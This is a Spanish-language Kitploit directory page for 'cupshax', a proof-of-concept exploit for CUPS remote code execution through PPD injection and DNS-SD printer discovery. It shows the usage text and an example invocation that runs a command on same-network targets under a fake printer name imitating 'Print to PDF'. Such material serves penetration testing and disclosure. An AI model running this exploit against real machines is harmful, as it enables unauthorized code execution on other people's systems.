Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cupshax — Prueba de concepto rápida para el reciente exploit de CUPS que permite la ejecución remota de código mediante inyección de PPD y descubrimiento de impresoras DNS-SD. Ejecuta comandos arbitrarios en sistemas Unix vulnerables. | Kitploit
Herramientas/GitHubGitHub/rickdejager/cupshax
ReconocimientoMapeo de RedesExplotaciónPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubrickdejager/cupshax

cupshax

Prueba de concepto rápida para el reciente exploit de CUPS que permite la ejecución remota de código mediante inyección de PPD y descubrimiento de impresoras DNS-SD. Ejecuta comandos arbitrarios en sistemas Unix vulnerables.

Ver Repositorio
23058hace 1 añoRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CUPSHax

Prueba de concepto rápida para el exploit reciente de CUPS. Planeaba pulirlo mucho más, pero el embargo se levantó mucho antes de lo esperado, así que el código está un poco apresurado.

Para todos los detalles técnicos, honestamente deberías leer el artículo de Evilsocket.

Este exploit fue escrito después de ver este commit en el repositorio público de OpenPrinting CUPS. Probablemente haya puntos de inyección más limpios.

Este PoC usa el descubrimiento de impresoras mediante dns-sd, por lo que el objetivo debe poder recibir el mensaje de broadcast, es decir, estar en la misma red.

Uso

El exploit usa zeroconf e ippserver, ambos se pueden instalar con pip.

root@kitploit:~
usage: cupshax.py [-h] [--name NAME] --ip IP [--command COMMAND] [--port PORT] [--base64 | --no-base64]

A CUPS PPD injection PoC

options:
  -h, --help            show this help message and exit
  --name NAME           The name to use (default: RCE Printer)
  --ip IP               The IP address of the machine running this script
  --command COMMAND     The command to execute (default: 'touch /tmp/pwn')
  --port PORT           The port to connect on (default: 8631)
  --base64, --no-base64
                        Wrap the command in base64 (default: enabled)

Por ejemplo:

root@kitploit:~
python cupshax.py --name "Print to PDF (Color)" \
                  --command "id>/tmp/pwn" \
                  --ip 10.0.0.3
Descargar herramienta